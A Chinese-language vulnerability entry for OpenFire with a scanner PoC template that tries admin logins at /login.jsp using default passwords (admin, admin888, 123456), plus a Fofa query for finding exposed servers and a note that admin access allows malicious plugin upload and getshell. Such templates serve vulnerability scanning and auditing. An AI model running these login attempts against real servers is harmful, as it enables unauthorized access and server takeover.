漏洞描述
openfire是基于XMPP协议的即时通讯框架,提供插件扩展,像Spark 一样易于部署。openfire允许后台上传未经校验的恶意插件,可导致直接getshell和控制服务器。
Fofa: app="OpenFire"
openfire-default-password: OpenFire 默认账号密码
PoC代码[已公开]
id: openfire-default-password
info:
name: OpenFire 默认账号密码
author: gu
severity: high
verified: true
description: |
openfire是基于XMPP协议的即时通讯框架,提供插件扩展,像Spark 一样易于部署。openfire允许后台上传未经校验的恶意插件,可导致直接getshell和控制服务器。
Fofa: app="OpenFire"
solutions:
reference:
- https://mp.weixin.qq.com/s/PGaCY-GbWyx8z2nLErNlUg
tags: openfire
created: 2023/07/24
set:
hosturl: request.url.scheme+"://"+request.url.host
randcsrf: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /login.jsp
headers:
cookie: JSESSIONID=; csrf={{randcsrf}}
body: url=%2Findex.jsp&login=true&csrf={{randcsrf}}&username=admin&password=admin
expression: response.status == 302 && response.headers["location"].contains(hosturl+"/index.jsp")
extractors:
- type: word
extractor:
user: "admin"
pass: "admin"
r1:
request:
method: POST
path: /login.jsp
headers:
cookie: JSESSIONID=; csrf={{randcsrf}}
body: url=%2Findex.jsp&login=true&csrf={{randcsrf}}&username=admin&password=admin888
expression: response.status == 302 && response.headers["location"].contains(hosturl+"/index.jsp")
extractors:
- type: word
extractor:
user: "admin"
pass: "admin888"
r2:
request:
method: POST
path: /login.jsp
headers:
cookie: JSESSIONID=; csrf={{randcsrf}}
body: url=%2Findex.jsp&login=true&csrf={{randcsrf}}&username=admin&password=123456
expression: response.status == 302 && response.headers["location"].contains(hosturl+"/index.jsp")
extractors:
- type: word
extractor:
user: "admin"
pass: "123456"
expression: r0() || r1() || r2()